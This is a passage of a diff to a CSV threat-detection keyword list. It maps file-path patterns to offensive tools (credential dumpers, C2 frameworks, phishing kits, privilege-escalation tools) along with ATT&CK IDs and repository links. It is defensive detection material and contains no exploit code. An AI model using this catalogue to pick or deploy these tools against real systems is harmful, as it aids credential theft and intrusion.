T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*/ghidra*","offensive_tool_keyword","ghidra","Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured. high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows. macOS. and Linux. Capabilities include disassembly. assembly. decompilation. graphing. and scripting. along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.","T1057 - T1053 - T1564 - T1204 - T1083","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/NationalSecurityAgency/ghidra","1","0","N/A","N/A","10","43256","5253","2023-10-04T16:39:02Z","2019-03-01T03:27:48Z" +"*/ghostfile.aspx*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*/GhostInTheNet.git*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/GhostInTheNet.sh*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/GhostInTheNet-master*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" -"*/ghostscript/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/ghostscript/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/gimmeSH.sh*","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","168","27","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" "*/giop-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/GithubC2.git*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" @@ -3680,20 +3695,20 @@ "*/glit-core*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" "*/globeimposter.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/gmailC2.exe*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"*/gMSA_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/gMSA_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/gMSADumper*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" "*/GMSAPasswordReader.git*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" -"*/gobuster.git*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/gobuster/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/gobusterdir/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/gobusterdns/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/gobustergcs/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/gocrack.git*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*/gocrack/.hashcat*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*/gocrack/server*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*/gocrack_server*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*/gocrack_worker*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*/gocrack-1.0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gobuster.git*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobuster/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobusterdir/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobusterdns/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobustergcs/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gocrack.git*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack/.hashcat*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack/server*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack_server*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack_worker*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack-1.0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" "*/goDoH.git*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*/godoh/*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*/GoFetch.git*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" @@ -3704,35 +3719,37 @@ "*/GONET-Scanner/*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","1","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" "*/goPassGen.git*","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" "*/gopher-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/gophish.db*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9757","1875","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" -"*/gophish/*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9757","1875","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*/gophish.db*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*/gophish/*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" "*/gorsair.go*","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" -"*/go-secdump.git*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*/go-secdump.git*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" "*/gosecretsdump*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/Gotato.git*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*/gotato.go*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*/goZulipC2.git*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" -"*/GPOddity.git*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*/GPOddity/*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*/GPOddity.git*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*/GPOddity/*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*/gpp_autologin.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/gpp_password.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/gpp-decrypt*","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/gpsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/GreatSCT/*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/GreatSCT/GreatSCT*","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/greatsct-output*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" -"*/Group3r.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*/Grouper2.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*/GruntHTTP.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/gtfobins.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/Group3r.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/Grouper2.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 